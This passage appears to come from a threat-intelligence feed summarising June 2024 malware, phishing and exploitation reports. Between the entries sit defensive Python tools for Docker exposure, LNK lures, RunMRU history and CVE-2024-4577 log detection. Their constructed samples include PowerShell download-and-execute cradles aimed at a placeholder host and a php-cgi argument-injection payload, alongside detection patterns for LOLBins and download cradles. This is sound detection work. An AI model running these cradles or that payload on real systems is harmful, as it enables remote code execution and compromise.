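    return hosts, tls_verify


def audit(daemon_json, cmdline):
    """Return a list of findings; an empty list means no TCP listener lacks client auth."""
    hosts, tls_verify = collect_config(daemon_json, cmdline)
    findings = []
    for bind, port in tcp_listeners(hosts):
        where = "tcp://%s:%d" % (bind or "*", port)
        if not tls_verify:
            # "tls": true alone only encrypts; without tlsverify any client is accepted.
            sev = "CRITICAL" if bind in PUBLIC_BINDS else "HIGH"
            findings.append("%s: %s accepts Docker API calls without TLS client authentication" % (sev, where))
        elif bind in PUBLIC_BINDS:
            findings.append("INFO: %s is bound to all interfaces (mutual TLS enforced)" % where)
    return findings


# Constructed inputs: an exposed daemon and a hardened one.
EXPOSED_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"], "log-driver": "json-file"}'
HARDENED_DAEMON_JSON = ('{"hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"], "tlsverify": true, '
                        '"tlscacert": "/etc/docker/ca.pem", "tlscert": "/etc/docker/server-cert.pem", '
                        '"tlskey": "/etc/docker/server-key.pem"}')
SYSTEMD_CMDLINE = "/usr/bin/dockerd --containerd=/run/containerd/containerd.sock"

if __name__ == "__main__":
    for label, cfg in (("exposed", EXPOSED_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit(cfg, SYSTEMD_CMDLINE) or ["no findings"])
```

Note that `"tls": true` on its own only encrypts the channel; the audit treats only `tlsverify` as authentication, because that is the setting that makes dockerd demand a client certificate signed by the configured CA.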
2024-06-18
Malvertising_Campaign_Executes_Oyster_Backdoor
MEDIUM
+
Intel Source:
Rapid7
Intel Name:
Malvertising_Campaign_Executes_Oyster_Backdoor
Date of Scan:
2024-06-18
Impact:
MEDIUM
Summary:
Rapid7 researchers have uncovered a malvertising campaign tricking users into downloading fake installers for popular software like Google Chrome and Microsoft Teams. These installers install a backdoor called Oyster or Broomstick. Once installed, the backdoor runs commands and adds more malicious software. This occurs when users find these fake websites through search engines like Google and Bing when looking for Microsoft Teams. The fake websites look like real Microsoft Teams sites, making users think they are downloading legitimate software, but they are downloading malware.
Source: https://www.rapid7.com/blog/post/2024/06/17/malvertising-campaign-leads-to-execution-of-oyster-backdoor/
2024-06-18
UNC3886_Espionage_Operations
MEDIUM
+
Intel Source:
Mandiant, Google Cloud Blog
Intel Name:
UNC3886_Espionage_Operations
Date of Scan:
2024-06-18
Impact:
MEDIUM
Summary:
Last year, Mandiant started investigating multiple intrusions by UNC3886, a suspected China-nexus cyberespionage actor that has targeted prominent strategic organizations worldwide. The blog post describes UNC3886's intrusion path and the actions performed after compromising guest virtual machines to reach critical systems: the use of publicly available rootkits for long-term persistence, deployment of malware that leveraged trusted third-party services for command and control (C2), subversion of access and collection of credentials with Secure Shell (SSH) backdoors, and extraction of credentials from TACACS+ authentication using custom malware.
Source: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations/
2024-06-18
Paris_2024_Summer_Olympic_Games_fraud_website
LOW
+
Intel Source:
Proofpoint
Intel Name:
Paris_2024_Summer_Olympic_Games_fraud_website
Date of Scan:
2024-06-18
Impact:
LOW
Summary:
This month, Proofpoint discovered a fake website that is selling tickets to the Paris 2024 Summer Olympic Games. The website “paris24tickets[.]com” claimed to be a “secondary marketplace for sports and live events tickets.” It was listed as the second sponsored search result on Google, after the official website, when searching for “Paris 2024 tickets,” and related searches.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-scammers-create-fraudulent-olympics-ticketing-websites
2024-06-18
New_NetSupport_campaign_delivered
LOW
+
Intel Source:
ISC.SANS
Intel Name:
New_NetSupport_campaign_delivered
Date of Scan:
2024-06-18
Impact:
LOW
Summary:
Attackers routinely reuse and combine known techniques in new campaigns. Last week, ISC.SANS researcher Xavier Mertens spotted several malicious MSIX packages on VT that drop a NetSupport client preconfigured to phone home to an attacker-controlled manager. Remote support tools are attractive to attackers because they provide a ready-made way to communicate with infected computers without developing their own C2 infrastructure and protocol.
Source: https://isc.sans.edu/diary/New+NetSupport+Campaign+Delivered+Through+MSIX+Packages/31018/
2024-06-18
Analysis_of_recent_LNK_phishing
LOW
+
Intel Source:
Splunk
Intel Name:
Analysis_of_recent_LNK_phishing
Date of Scan:
2024-06-18
Impact:
LOW
Summary:
Splunk analysts provided a deep analysis of recent LNK phishing campaigns, examining the tactics, techniques, and procedures (TTPs) employed by threat actors. Splunk also presented tools and techniques for simulating these phishing campaigns, helping defenders test their defenses against malicious LNK usage.
Source: https://www.splunk.com/en_us/blog/security/lnk-phishing-analysis-simulation.html
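Triage of a suspicious shortcut starts with reading the fields the lure hides behind the icon: the target, its arguments, the icon location and the show command. The parser below is an added example for this entry, not Splunk's tooling; it follows the [MS-SHLLINK] layout (76-byte header, optional LinkTargetIDList and LinkInfo blocks skipped by size, then the StringData fields in fixed order) and applies a short indicator list of this example's own choosing. The two shortcuts it inspects are constructed by `build_sample_lnk()` and are not real phishing artifacts.

```python
"""Parse a Windows shortcut (.lnk) and pull out the fields that matter when
triaging LNK phishing: target path, arguments, icon location and show command.

Added example for the Splunk entry above; it is not Splunk's tooling. The
layout follows [MS-SHLLINK]: a 76-byte ShellLinkHeader, optional
LinkTargetIDList and LinkInfo blocks (skipped by their size fields), then the
StringData fields in a fixed order. build_sample_lnk() constructs the test
shortcuts; they are not real phishing artifacts, and the indicator list is
this example's own.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData fields appear in this order when their flag bit is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
SW_SHOWMINNOACTIVE = 7

INDICATORS = (
    (r"\b(powershell|pwsh|cmd)(\.exe)?\b", "script interpreter launched from a shortcut"),
    (r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "Base64-encoded PowerShell command"),
    (r"-w(indowstyle)?\s+hidden", "hidden window requested"),
    (r"\b(mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)\b", "LOLBin in arguments"),
    (r"\b(iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|iwr|irm)\b", "download-and-execute cradle"),
)


def parse_lnk(data):
    """Return a dict of header fields and the StringData present in the shortcut."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (uint16) + ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (uint32) covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags, "show_command": show_cmd}
    is_unicode = bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        nbytes = count * 2 if is_unicode else count
        fields[name] = data[pos:pos + nbytes].decode("utf-16-le" if is_unicode else "cp1252", "replace")
        pos += nbytes
    return fields


def triage_lnk(data):
    """Return human-readable reasons a shortcut looks like a phishing lure."""
    f = parse_lnk(data)
    text = " ".join(f.get(k, "") for k in ("relative_path", "arguments", "icon_location"))
    reasons = [why for pat, why in INDICATORS if re.search(pat, text, re.IGNORECASE)]
    if f["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    icon = f.get("icon_location", "")
    target = (f.get("relative_path", "") + " " + f.get("arguments", "")).lower()
    if icon and "powershell" in target and "powershell" not in icon.lower():
        reasons.append("icon taken from %s while the target is PowerShell" % icon.rsplit("\\", 1)[-1])
    return reasons


def build_sample_lnk(relative_path, arguments, icon_location, show_command=SW_SHOWMINNOACTIVE):
    """Construct a minimal Unicode shortcut carrying only StringData (constructed test data)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0x20)  # attrs: ARCHIVE
    header += b"\x00" * 24                                              # three zero FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)   # FileSize, IconIndex, ShowCommand, HotKey, reserved
    body = b""
    for s in (relative_path, arguments, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed lure: a PowerShell download cradle hidden behind a Word icon.
LURE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\"",
    r"%ProgramFiles%\Microsoft Office\root\Office16\WINWORD.EXE",
)
BENIGN_LNK = build_sample_lnk(r"..\notes.txt", "", r"%SystemRoot%\System32\notepad.exe", show_command=1)

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(blob) or ["nothing suspicious"])
```

Real-world shortcuts usually carry the target in the LinkTargetIDList rather than in RelativePath; the parser skips that block, so for full coverage a production tool would also walk the ItemID structures. The StringData fields alone are still where the arguments and icon path live, which is where most lure indicators appear.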
2024-06-18
Coin_miner_attacks_targeting_domestic_web_servers
LOW
+
Intel Source:
ASEC
Intel Name:
Coin_miner_attacks_targeting_domestic_web_servers
Date of Scan:
2024-06-18
Impact:
LOW
Summary:
ASEC researchers have uncovered attacks on the Windows IIS server of a Korean medical institution running PACS (Picture Archiving and Communication System) software, which hospitals use to manage and share medical images. Two separate attacks by Chinese-speaking threat actors were observed. In both, the attackers uploaded web shells by exploiting PACS vulnerabilities or security misconfigurations. In the first attack they used web shells such as Chopper and Behinder to gather system information, escalated privileges with BadPotato, and installed Cpolar for remote access. In the second attack they used different tools, including GodPotato for privilege escalation and EarthWorm for tunneling. Both attacks ultimately installed the XMRig coin miner.
Source: https://asec.ahnlab.com/ko/66860/
2024-06-18
The_Journey_of_Markopolo
LOW
+
Intel Source:
Recorded Future
Intel Name:
The_Journey_of_Markopolo
Date of Scan:
2024-06-18
Impact:
LOW
Summary:
Researchers at Recorded Future have identified fake virtual meeting software named Vortax that, once downloaded and installed, delivers three infostealers: Rhadamanthys, Stealc, and, most notably, Atomic macOS Stealer (AMOS), as part of a larger campaign to steal cryptocurrency. The campaign is operated by a threat actor known as markopolo, and its extensive reach suggests that similar tactics will be used in future to propagate AMOS, likely leading to a sustained rise in the number of AMOS victims.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0617.pdf
2024-06-18
Rising_wave_of_QR_code_phishing_attacks
LOW
+
Intel Source:
Cyble
Intel Name:
Rising_wave_of_QR_code_phishing_attacks
Date of Scan:
2024-06-18
Impact:
LOW
Summary:
Source: https://cyble.com/blog/rising-wave-of-qr-code-phishing-attacks-chinese-citizens-targeted-using-fake-official-documents/
2024-06-18
ONNX_Store_PhaaS_Targeting_Financial_Institutions
MEDIUM
+
Intel Source:
EclecticIQ
Intel Name:
ONNX_Store_PhaaS_Targeting_Financial_Institutions
Date of Scan:
2024-06-18
Impact:
MEDIUM
Summary:
EclecticIQ researchers have identified a phishing campaign targeting financial institutions. Attackers are using PDF documents with embedded QR codes to lead victims to phishing websites. The campaign is run through ONNX Store, a Phishing-as-a-Service (PhaaS) platform that includes a two-factor authentication (2FA) bypass system which intercepts victims' 2FA requests.
Source: https://blog.eclecticiq.com/onnx-store-targeting-financial-institution
2024-06-18
New_Diamorphine_rootkit_variant_in_the_wild
LOW
+
Intel Source:
Avast
Intel Name:
New_Diamorphine_rootkit_variant_in_the_wild
Date of Scan:
2024-06-18
Impact:
LOW
Summary:
In March 2024, Avast researchers discovered a new Diamorphine variant that was undetected in the wild. Inspection of the sample's .modinfo section showed that it masquerades as the legitimate x_tables Netfilter module and was compiled for a specific kernel version. Diamorphine is a well-known Linux kernel rootkit that supports several Linux kernel branches (2.6.x, 3.x, 4.x, 5.x and 6.x) and processor architectures (x86, x86_64, and ARM64). When loaded, the module makes itself invisible and hides all files and directories whose names start with a magic prefix chosen by the attacker.
Source: https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/
2024-06-18
Latrodectus_loader_came_back
MEDIUM
+
Intel Source:
Bitsight
Intel Name:
Latrodectus_loader_came_back
Date of Scan:
2024-06-18
Impact:
MEDIUM
Summary:
Last month, Operation Endgame disrupted several large botnets and took their infrastructure offline. Latrodectus was not among the named targets, but its infrastructure also went offline, consistent with the overlap observed between Latrodectus and IcedID infrastructure. Latrodectus is a loader capable of downloading and executing additional payloads and modules to extend its own functionality. It is usually distributed through email spam campaigns, primarily by the threat actors tracked as TA577 and TA578.
Source: https://www.bitsight.com/blog/latrodectus-are-you-coming-back
2024-06-17
NetSupport_Campaign_Delivering_via_MSIX_Packages
LOW
+
Intel Source:
ISC.SANS
Intel Name:
NetSupport_Campaign_Delivering_via_MSIX_Packages
Date of Scan:
2024-06-17
Impact:
LOW
Summary:
ISC.SANS researchers have discovered several malicious MSIX packages on VT that drop a NetSupport client that is ready to call home to a manager under the control of the attacker. Attackers benefit from remote support tools because they offer an ideal means of communication with compromised systems without requiring the development of their own C2 infrastructure and protocol. While certain programs, like AnyDesk or TeamViewer, are well-known and frequently looked up as signs of compromise, other programs, like NetSupport, are more likely to go unnoticed. This one has all the anticipated capabilities to communicate with victims and is free for 30 days.
Source: https://isc.sans.edu/diary/rss/31018
2024-06-17
Korean_Corporations_ERP_Server_and_Installs_VPN_Server
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Korean_Corporations_ERP_Server_and_Installs_VPN_Server
Date of Scan:
2024-06-17
Impact:
MEDIUM
Summary:
The AhnLab Security Intelligence Center has discovered a cyberattack on a Korean corporation's ERP server, where the attacker exploited a vulnerable MS-SQL service. Initially, the threat actor scanned the network, gathered system information, and tested payload downloads. They then installed a web shell for persistent access and control, ultimately deploying SoftEther VPN to use the compromised system as a VPN server. The configuration indicated a "cascade connection," suggesting the VPN server was linked to another VPN server, likely to establish a more secure and private command and control (C&C) infrastructure.
Source: https://asec.ahnlab.com/en/66843/
2024-06-17
Noodle_RAT_Backdoor_Used_by_Chinese_Speaking_Groups
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Noodle_RAT_Backdoor_Used_by_Chinese_Speaking_Groups
Date of Scan:
2024-06-17
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have identified a new malware called Noodle RAT, also known as ANGRYREBEL or NoodRAT, used in attacks targeting the Asia-Pacific region. It has both Windows and Linux versions with distinct attributes. The Windows version, Win.NOODLERAT, runs in memory and requires specific loaders, MULTIDROP and MICROLOAD; it is used by several APT groups for espionage and communicates over TCP, SSL, and HTTP with encryption. The Linux version, Linux.NOODLERAT, supports TCP and HTTP and is used by several groups for both financially motivated and espionage purposes. Noodle RAT continues to evolve, making it a significant cross-platform threat.
Source: https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html
2024-06-17
Shinra_and_Limpopo_ransomware_variants
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Shinra_and_Limpopo_ransomware_variants
Date of Scan:
2024-06-17
Impact:
MEDIUM
Summary:
FortiGuard Labs reported on two ransomware variants, Shinra and Limpopo, that have been gaining attention within the OSINT community, providing insight into the evolving ransomware landscape and how to protect against them. The threat actor steals victims' data before deploying the ransomware to encrypt files, and the ransomware also deletes Volume Shadow Copies to inhibit system recovery. Separately, in March FortiGuard Labs received an inquiry about another ransomware named "Socotra" because of its impact in that region. No Socotra sample was available, but it was traced back to another ransomware, Limpopo, which was submitted to a publicly available file scanning service in February 2024 and targets ESXi environments.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-shinra-and-limpopo-ransomware
2024-06-17
Velvet_Ant_Abuses_F5_Load_Balancers
LOW
+
Intel Source:
Sygnia
Intel Name:
Velvet_Ant_Abuses_F5_Load_Balancers
Date of Scan:
2024-06-17
Impact:
LOW
Summary:
Sygnia researchers have uncovered a cyber-attack on a large organization in East Asia attributed to a sophisticated group known as Velvet Ant, possibly China-linked. The group had been inside the organization's network for about three years, using advanced techniques and tools such as the PlugX malware, exploiting legacy systems and F5 BIG-IP devices to stay hidden and control network traffic. Velvet Ant evades detection by relying on dormant malware and on systems that are not closely monitored.
Source: https://www.sygnia.co/blog/china-nexus-threat-group-velvet-ant/
2024-06-17
Kimsuky_group_launched_a_cyber_espionage_campaign
HIGH
+
Intel Source:
GBhackers
Intel Name:
Kimsuky_group_launched_a_cyber_espionage_campaign
Date of Scan:
2024-06-17
Impact:
HIGH
Summary:
A BlackBerry threat researcher shared an article on LinkedIn identifying a cyber-espionage campaign by the North Korean state-sponsored group Kimsuky against a Western European weapons manufacturer. The attack began with a spear-phishing email sent to employees of the targeted organization, and the group deployed new tooling that showcases its evolving capabilities. The choice of target highlights the strategic importance of the defense sector; as a lure, the attackers impersonated a well-known military contractor, "General Dynamics".
Source: https://gbhackers.com/north-korean-kimsuky-attacking/
2024-06-17
TA571_and_ClearFake_Exploiting_PowerShell
LOW
+
Intel Source:
Proofpoint
Intel Name:
TA571_and_ClearFake_Exploiting_PowerShell
Date of Scan:
2024-06-17
Impact:
LOW
Summary:
Researchers from Proofpoint have discovered that hackers are using a technique to trick people into running harmful PowerShell scripts on their computers. This technique involves showing a fake error message and asking users to copy and paste malicious scripts into PowerShell or the Windows Run dialog box. Hackers like TA571 and the ClearFake group are using this method to spread malware such as DarkGate, Matanbuchus, NetSupport, and other data-stealing software.
Source: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
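When a victim pastes one of these "fix" commands into the Windows Run dialog, Explorer records the command in the RunMRU key, which makes that key a useful forensic and hunting artifact for this technique. The script below is an added example for this entry, not Proofpoint's detection: it orders the RunMRU entries by the MRUList value, strips the trailing `\1` terminator Explorer appends, and scores each command against indicators typical of the lure (PowerShell or mshta launched from Run, hidden-window and policy-bypass switches, Invoke-Expression of fetched content, download cradles). The registry contents are constructed and the weights are this example's own choices.

```python
"""Score Windows Run-dialog history (RunMRU) entries for the paste-and-run
PowerShell lure described above.

Added example for the Proofpoint entry; it is not Proofpoint's detection. When
a victim pastes a command into Win+R, Explorer records it under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU: one value
per entry (a, b, c ...), each terminated with "\\1", plus MRUList giving the
order from most recent to oldest. The registry values below are constructed
and the scoring weights are this example's own choices.
"""
import re

RULES = (
    (r"\b(powershell|pwsh)(\.exe)?\b", 2, "PowerShell started from the Run dialog"),
    (r"\bmshta(\.exe)?\b", 3, "mshta started from the Run dialog"),
    (r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", 3, "Base64-encoded command"),
    (r"-w(indowstyle)?\s*hidden|-nop\b|-noni\b|-(ep|executionpolicy)\s*bypass", 2, "window-hiding or policy-bypass switches"),
    (r"\b(iex|invoke-expression)\b", 3, "Invoke-Expression of fetched content"),
    (r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|net\.webclient|curl|bitsadmin)\b", 3, "remote content fetch"),
    (r"\b(get-clipboard|set-clipboard|gcb|scb)\b", 2, "clipboard interaction"),
    (r"https?://\S+", 1, "URL in the command"),
)
THRESHOLD = 6


def parse_runmru(values):
    """Return the Run history most-recent first, with the trailing '\\1' removed.

    `values` mirrors the RunMRU key: {"MRUList": "cba", "a": "notepad\\1", ...}.
    """
    order = values.get("MRUList", "")
    names = [c for c in order if c in values]
    names += sorted(k for k in values if len(k) == 1 and k not in order)  # entries missing from MRUList
    entries = []
    for n in names:
        v = values[n]
        entries.append(v[:-2] if v.endswith("\\1") else v)
    return entries


def score_command(cmd):
    """Return (score, reasons) for one Run-dialog command."""
    score, reasons = 0, []
    for pattern, weight, why in RULES:
        if re.search(pattern, cmd, re.IGNORECASE):
            score += weight
            reasons.append(why)
    return score, reasons


def suspicious_runmru(values, threshold=THRESHOLD):
    """Return the Run history entries whose score reaches the threshold."""
    hits = []
    for cmd in parse_runmru(values):
        score, reasons = score_command(cmd)
        if score >= threshold:
            hits.append({"command": cmd, "score": score, "reasons": reasons})
    return hits


# Constructed RunMRU contents: two normal entries and one pasted "fix" command.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "powershell -w hidden -nop -c \"iex (irm http://example.invalid/fix.ps1)\"\\1",
}

if __name__ == "__main__":
    for hit in suspicious_runmru(SAMPLE_RUNMRU):
        print(hit["score"], hit["command"])
        for why in hit["reasons"]:
            print("   -", why)
```

On a live host the same dictionary can be filled from `winreg` (or from an exported hive during incident response); a complementary telemetry source is PowerShell script block logging (Event ID 4104), which captures the decoded command even when the attacker's lure used an encoded form.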
2024-06-14
Analysis_of_the_Qilin_RaaS
LOW
+
Intel Source:
BushidoToken Threat Intel
Intel Name:
Analysis_of_the_Qilin_RaaS
Date of Scan:
2024-06-14
Impact:
LOW
Summary:
Qilin ransomware has been active since at least May 2022 and is named after a mythical Chinese beast pronounced "Chee-lin". However, it is thought that this threat group of cybercriminals originated in Russia. Qilin is a Ransomware-as-a-Service (RaaS) platform, which means that hackers outside of the main Qilin team (also known as ransomware affiliates) can use it to launch ransomware attacks. The Qilin RaaS will handle payload creation, stolen data dissemination, and ransom negotiations.
Source: https://blog.bushidotoken.net/2024/06/tracking-adversaries-qilin-raas.html
2024-06-14
KimSuki_Impersonation_Attack_Uncovered_in_Foreign_Media_Interview_Request
LOW
+
Intel Source:
Genians
Intel Name:
KimSuki_Impersonation_Attack_Uncovered_in_Foreign_Media_Interview_Request
Date of Scan:
2024-06-14
Impact:
LOW
Summary:
Genians researchers have uncovered a sophisticated spear-phishing campaign targeting North Korean human rights activists. The attackers pose as researchers from a foreign news agency and send fake interview requests about peace on the Korean Peninsula. They use malicious MSC files disguised as benign documents; once opened, these connect to a C2 server in Italy to steal information. The same MSC-based technique has also been associated with the China-based threat group Mustang Panda. The attackers approach their targets through both email and Facebook, making the attacks more effective.
Source: https://www.genians.co.kr/blog/threat_intelligence/interview
2024-06-14
Diving_Deep_into_Botnet_911S5_Digital_Legacy
LOW
+
Intel Source:
NetLab
Intel Name:
Diving_Deep_into_Botnet_911S5_Digital_Legacy
Date of Scan:
2024-06-14
Impact:
LOW
Summary:
According to analysis by the 360 Threat Intelligence Center, 911S5 started operating in 2014 and was shut down in July 2022. It resurfaced in October 2023 under the alias CloudRouter and continued operating until it was dismantled by multinational law enforcement in May 2024. The 911S5 botnet is notable for its high-profile activity, its long running duration, and the 19 million IP addresses it accumulated across several countries. Law enforcement action brought it down, but its digital legacy remains a real and significant threat.
Source: https://blog.netlab.360.com/911s5/
2024-06-14
SolarMarker_Impersonates_as_Indeed_Job_Site_with_Team_Building_Theme
MEDIUM
+
Intel Source:
Esentire
Intel Name:
SolarMarker_Impersonates_as_Indeed_Job_Site_with_Team_Building_Theme
Date of Scan:
2024-06-14
Impact:
MEDIUM
Summary:
Researchers at eSentire investigated a SolarMarker infection that originated from a fake website masquerading as the job search platform Indeed. A user searching for workplace team-building ideas was redirected to the malicious site and unknowingly downloaded what appeared to be a legitimate document but was in fact the SolarMarker malware. SolarMarker employs techniques such as encrypted backdoors and injection, and deploys components such as StellarInjector and SolarPhantom to steal data and maintain hidden access to infected machines.
Source: https://www.esentire.com/blog/solarmarker-impersonates-job-employment-website-indeed-with-a-team-building-themed-lure
2024-06-14
PHP_vulnerability_under_active_exploit
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
PHP_vulnerability_under_active_exploit
Date of Scan:
2024-06-14
Impact:
MEDIUM
Summary:
Bitdefender has also warned about active exploitation of a vulnerability in PHP. CVE-2024-4577 is a critical flaw affecting PHP versions 5.x and later on Windows servers, enabling attackers to remotely execute PHP code on vulnerable servers. The vulnerability stems from how PHP handles Windows character conversions ("Best-Fit" mapping), which is exploitable on locales such as Chinese or Japanese. Successful exploitation gives attackers control over the server, putting data confidentiality, system integrity, and availability at risk. Cybercriminals, including the "TellYouThePass" ransomware group, have been actively scanning for and exploiting this vulnerability.
Source: https://www.bitdefender.com/blog/businessinsights/technical-advisory-cve-2024-4577-php-vulnerability-under-active-exploit/
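The character-conversion detail above is what makes this bug visible in web logs. The public advisory for CVE-2024-4577 describes the Best-Fit behaviour: on affected Windows locales php-cgi maps the soft hyphen byte 0xAD to an ASCII hyphen, so a percent-encoded `%AD` in the query string can become a php-cgi option switch such as `-d`. The scanner below is an added example for this entry, not Bitdefender's code; it parses combined-format access log lines, decodes each request the way the CGI front end would, applies the same 0xAD to `-` mapping, and alerts on requests that end up carrying `-d` directives while ignoring a lone soft hyphen in ordinary input. The log lines are constructed.

```python
"""Scan web server access logs for CVE-2024-4577 exploitation attempts.

Added example for the Bitdefender entry above; it is not Bitdefender's code.
The public advisory for this CVE describes a Best-Fit character conversion
problem in php-cgi on Windows: on affected locales the soft hyphen byte 0xAD
is mapped to an ASCII hyphen, so a percent-encoded 0xAD in the query string
can become a php-cgi option such as "-d". This scanner decodes each request
the way the CGI front end would, applies that same mapping, and flags requests
that end up carrying "-d" directives. The log lines are constructed.
"""
import re
from urllib.parse import unquote_to_bytes

# Combined log format prefix: client, ident, user, [time], "METHOD target HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# php.ini directives that turn an argument injection into code execution or weaken protections.
DANGEROUS_DIRECTIVES = (
    "allow_url_include", "auto_prepend_file", "auto_append_file",
    "cgi.force_redirect", "disable_functions", "open_basedir",
)
OPTION_RE = re.compile(r"(?:^|\s)-d\s*([A-Za-z_.]+)\s*=")


def decode_query(target):
    """Percent-decode the query string (treating '+' as space) and apply the
    soft-hyphen -> '-' Best-Fit mapping php-cgi performs on affected locales."""
    query = target.split("?", 1)[1] if "?" in target else ""
    raw = unquote_to_bytes(query.replace("+", " "))
    return raw.replace(b"\xad", b"-")


def inspect_request(target):
    """Describe what php-cgi would see for one request target."""
    text = decode_query(target).decode("latin-1")
    directives = OPTION_RE.findall(text)
    return {
        "soft_hyphen": "%ad" in target.lower(),
        "directives": directives,
        "dangerous": [d for d in directives if d in DANGEROUS_DIRECTIVES],
        "php_input": "php://input" in text.lower(),
    }


def scan_log(lines):
    """Return one alert per request that injects php-cgi directives."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        r = inspect_request(m.group("target"))
        # A lone soft hyphen (e.g. inside a search term) is not enough; require an
        # injected dangerous directive, or a soft hyphen that produced any "-d" option.
        if r["dangerous"] or (r["soft_hyphen"] and r["directives"]):
            alerts.append({
                "ip": m.group("ip"), "time": m.group("time"), "status": m.group("status"),
                "target": m.group("target"), "directives": r["directives"], "php_input": r["php_input"],
            })
    return alerts


# Constructed access-log lines: two injection attempts, one legitimate soft hyphen, one normal request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2024:03:14:07 +0000] "POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '203.0.113.7 - - [10/Jun/2024:03:14:09 +0000] "GET /cgi-bin/php-cgi.exe?%ADd+cgi.force_redirect%3d0 HTTP/1.1" 500 0 "-" "curl/8.6.0"',
    '198.51.100.4 - - [10/Jun/2024:03:15:11 +0000] "GET /index.php?page=soft%ADhyphen HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jun/2024:03:16:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["time"], a["ip"], a["status"], a["directives"], "php://input" if a["php_input"] else "")
```

The `allow_url_include` plus `auto_prepend_file=php://input` pair in the first sample line is the combination to watch for: it tells php-cgi to execute the POST body as PHP, so a 200 response to such a request should be treated as a likely compromise rather than a blocked attempt.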
2024-06-14
Matanbuchus_Malware
LOW
+
Intel Source:
Esentire
Intel Name:
Matanbuchus_Malware
Date of Scan:
2024-06-14
Impact:
LOW
Summary:
Researchers at eSentire have noticed a rise in Matanbuchus observations. Matanbuchus is a loader first discovered in 2021 that has been used to deliver several secondary payloads, including DanaBot, Qakbot, and Cobalt Strike. In recent cases, malicious web-browser advertising (malvertising) was used to drive users to threat actor-controlled pages that prompted them to download a ZIP file; Matanbuchus is deployed once the user extracts and runs the archive's contents. All recent instances were interrupted before a secondary payload was delivered.
Source: https://www.esentire.com/security-advisories/matanbuchus-malware
2024-06-14
Smishing_Triad_targeting_Pakistan
LOW
+
Intel Source:
Resecurity
Intel Name:
Smishing_Triad_targeting_Pakistan
Date of Scan:
2024-06-14
Impact:
LOW
Summary:
